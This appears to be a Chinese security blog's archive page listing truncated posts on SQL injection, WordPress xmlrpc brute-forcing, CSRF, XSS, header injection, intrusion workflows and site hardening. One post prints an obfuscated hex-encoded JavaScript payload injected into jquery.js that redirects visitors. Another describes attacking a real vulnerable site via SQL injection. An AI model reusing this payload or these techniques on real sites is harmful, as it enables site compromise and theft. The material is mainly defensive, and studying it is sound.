;

需要有mysql_error()反馈信息 http://blog.csdn.net/ysynhtt/article/details/45115849 http://websec.ca/kb/sql_injection http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

通过inser into进行注入 2017年8月16日
;

1.POST xml内容 <?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>username</value></param> <param><value>password</value></param> </params> </methodCall> 2.返回信息片段 <member> <name>isAdmin</name> <value> <boolean>1</boolean> </value> </member> <member> <name>faultString</name> <value> <string>用户名或密码不正确。</string> </v…

wordpress之xmlrpc攻击过程模拟 2017年7月26日
;

知识点: 1.多窗口浏览器(firefox、chrome)便捷的同时也带来了一些问题,因为多窗口浏览器新开的窗口是具有当前所有会话的。 即我用IE登陆了我的Blog,然后我想看新闻了,又运行一个IE进程,这个时候两个IE窗口的会话是彼此独立的,从看新闻的IE发送请求到Blog不会有我登录的cookie;但是多窗口浏览器永远都只有一个进程,各窗口的会话是通用的,即看新闻的窗口发请求到Blog是会带上我在blog登录的cookie。 2.Get请求伪造 博客删除一般是采用get请求,后面加上文章id号,所以如果我们能构造一个连接带有删除的请求和id,同时用户已经在浏览器上登陆了博客,那么会利用自带cookie来实现跨站请求的伪装。 例如某篇文章的操作链接如下: post.php?post=1391&action=trash&_wpnonce=2cf4aa198b //移至回收站 post.php?post=1391&action=untrash&_wpnonce=b783a7a116 //还原 post.php?post=1391&action=delete&_wpnonce=2f51a98293 //永久删除 注意到末尾的’_wpnonce=2cf4aa198b’的随机字符…

CSRF漏洞剖析 2017年4月24日
;

如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。 PHP5设置: setcookie($name, $value, $expire, $path, $domain, $secure, $httponly); 最后一个参数为HttpOnly属性

设置HttpOnly防止XSS攻击 2017年4月24日
;

方法一: 将用户的认证信息保证在一个cookie中,具体如下: 1.cookie名:uid。推荐进行加密,比如MD5(‘站点名称’)等。 2.cookie值:登录名|有效时间Expires|hash值。hash值可以由”登录名+有效时间Expires+用户密码(加密后的)的前几位 +salt”,salt是保证在服务器端站点配置文件中的随机数。 这样子设计有以下几个优点: 1.即使数据库被盗了,盗用者还是无法登录到系统,因为组成cookie值的salt是保证在服务器站点配置文件中而非数据 库。 2.如果账户被盗了,用户修改密码,可以使盗用者的cookie值无效。 3.如果服务器端的数据库被盗了,通过修改salt值可以使所有用户的cookie值无效,迫使用户重新登录系统。 4.有效时间Expires可以设置为当前时间+过去时间(比如2天),这样可以保证每次登录的cookie值都不一样,防止盗用者 窥探到自己的cookie值后作为后门,长期登录。 方法二: 每个用户登录之后生成一个随机的GUID,然后把GUID存在数据库里面(也可以考虑使用Redis,把用户信息和随机 GUID以KEY-VALUE方式存储 GUID-用户信息,存储时设置超时时间,比如20分钟,每次验证用户信息都自动延长20分 钟。如果…

如何保证Cookie自动登录的安全性 2017年4月24日
;

HTTP协议头注射漏洞原理 以下情况中会出现HTTP协议头注射漏洞: 1. 数据通过一个不可信赖的数据源进入Web 应用程序,最常见的是HTTP 请求。 2. 数据包含在一个HTTP 响应头文件里,未经验证就发送给了Web 用户。 其中最常见的一种Header Manipulation 攻击是HTTP Response Splitting。 为了成功地实施Http Response Splitting 盗取,应用程序必须允许将那些包含CR(回车,由%0d 或\r 指定)和LF(换行,由%0a 或\n 指定)的字符输入到头文件中。 攻击者利用这些字符不仅可以控制应用程序要发送的响应剩余头文件和正文,还可以创建完全受其控制的其他响应。 <?php $location = $_GET[‘some_location’]; header("location: $location"); ?> 假设在请求中提交了一个由标准的字母和数字字符组成的字符串,如”index.html”,那么包含此cookie 的HTTP 响应可能表现为以下形式: HTTP/1.1 200 OK … location: index.html … 然而,因为该位置的值由未经验证的用户输入组成,所以仅当提交…

Header注入 2017年4月24日
;

大多数人对于XSS的原理有一个基本认识,这里不再重复,只给出一个能够演示其原理的完整样例。 1 角色分配 有XXS漏洞的网站,IP地址172.16.35.135,PHP为开发语言 受害访问者,IP地址172.16.35.220,浏览器为IE11 黑客的数据接收网站,IP地址172.16.2.192,PHP为开发语言 2 源码实例 2.1 漏洞网站 存在漏洞的URL为:http://172.16.35.135/xss_demo.PHP <?php session_start(); ?> <!doctype html> <html> <head> <title>XSS demo</title> </head> <body> <form> <input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" /> <input type="submit" value=&qu…

XSS跨站脚本攻击过程最简单演示 2017年4月18日
;

1、信息收集 1.1/ Whois信息–注册人、电话、邮箱、DNS、地址 1.2/ Googlehack–敏感目录、敏感文件、更多信息收集 1.3/ 服务器IP–Nmap扫描、端口对应的服务、C段 1.4/ 旁注–Bing查询、脚本工具 1.5/ 如果遇到CDN–Cloudflare(绕过)、从子域入手(mail,postfix)、DNS传送域漏洞 1.6/ 服务器、组件(指纹)–操作系统、web server(apache,nginx,iis)、脚本语言 1.7/ More…通过信息收集阶段,攻击者基本上已经能够获取到网站的绝大部分信息,当然信息收集作为网站入侵的第一步,决定着后续入侵的成功。 2、漏洞挖掘 2.1/ 探测Web应用指纹–Discuz、PHPwind、Dedecms、Ecshop… 2.2/ XSS、CSRF、XSIO、SQLinjection、权限绕过、任意文件读取、文件包含… 2.3/ 上传漏洞–截断、修改、解析漏洞 2.4/ 有无验证码–进行暴力破解 2.5/ More…经过漫长的一天,攻击者手里已经掌握了你网站的大量信息以及不大不小的漏洞若干,下一步他们便会开始利用这些漏洞获取网站权限。 3、漏洞利用 3.1/ 思考目的性–达到什么样的效果 3.2/ 隐藏,破坏性–根据探测到的应用指纹寻找对应的EXP攻击载荷或者自己…

网站安全手册:入侵网站普遍的手法/流程 2017年4月18日
;

指纹识别的核心原理是通过正则表达式匹配特征码或匹配文件的md5值,收集指纹的主要原则是程序独有的不会因环境和配置不同而改变的特征。

web应用程序指识别中的指纹收集 2017年4月18日
;

1.开启域名隐私保护(暴露注册人信息) 2.关闭php的报错提示(暴露服务器物理路径) 3.网站备份文件不要用web.zip,www.zip,wwwroot.rar,.bak,.swp,.old等的通用名(暴露网站程序) 4.根目录下的readme.text,license.txt,help.txt,robots.txt等文件适当修改(同样暴露网站程序及路径) 5.临时测试文件避免命名为phpinfo.php,test.php,info.php等

网站安全总结 2017年4月18日
;

修改WP根目录的.htaccess文件,在底部加入以下代码 <Files ~ “^wp-login.php”> Order deny,allow Deny from all Allow from 195.196.0.1/255.255.0.0 (可选,里面写你的ip段) Allow from X.X.X.X (这里写你常用的ip,如果是多个就覆盖几行) </Files> 保存文件就没问题了,如果需要在其他ip登录,修改上面的地址即可。

通过htaccess阻止针对wp-login.php的攻击 2017年4月11日
;

php文件可通过url直接被访问,暴露各种路径信息。 通过配置’.htpaccess’始终无法如愿。 苦恼之时,后来突然意识到是因为PHP开启了错误提示导致。 文件位置: /etc/php5/apache2/php.ini 修改 display_errors = On 为 display_errors = Off

关闭直接通过url访问php文件 2017年3月20日
;

公司网站莫名被黑,初次打开跳转到别的网站,再打开不跳转,猜测cookie被写入,删除之调试,相关JS文件改回来,网站一旦访问再次被感染,影响上百个JS文件及部分PHP文件。 解决办法:全局清除感染代码。调整文件权限。 (整个病毒工作原理Malicious Pastebin Replacement for jQuery) jquery.js 文件后被追加如下代码,跳转地址为一个广告分发中心 var _0xaae8 = ["", "\x6A\x6F\x69\x6E", "\x72\x65\x76\x65\x72\x73\x65", "\x73\x70\x6C\x69\x74", "\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C", "\x77\x72\…

wodpress js文件注入相关代码 2017年2月7日
;

前几天微软skype的官方博客网站被黑客突破,虽然很快进行了修复,但从网友截屏的图片来看,应该一些抗议美国国安局监听行为和反对微软在软件里隐藏后门的黑客所为。 微软skype的官方博客使用的是WordPress平台,Wordpress目前是世界上最流行的博客平台,市场占有率高达70%,这次攻击事件虽然牵涉到wordpress,但并不能说明wordpress平台很脆弱,事实上脆弱的是wordpress上多达百万的各种第三方插件,这些插件的质量良莠不齐,如果你使用错误的插件,没有及时更新到最新版本,那你的wordpress网站就会成为黑客的目标。 All Video Gallery就是这样的一个典型例子。早在2012年6月份就有安全网站公布这个插件的1.1版有严重的安全漏洞,但我今天还是很轻松的使用谷歌搜到了仍然使用这个有漏洞的插件的网站。本文就是要以这个网站为靶子,给大家实战讲解黑客是如何利用sql注入技术攻破一个网站的。 这个网站看起来像是印度或巴基斯坦的某个公立学校的网站。我不想在这里透露这个网站的真实地址,如果你也想实战一下,可以自己架设一个wordpress网站,安装上这个有安全漏洞的插件。如果你真的有兴趣想看看这个网站、非恶意的,请关注我的微薄 @外刊IT评论,和我私信联系。 SQL注入的基本原理 sql注入成因主要是对页面参数没有进…

如何利用SQL注入漏洞攻破一个WordPress网站 2016年12月2日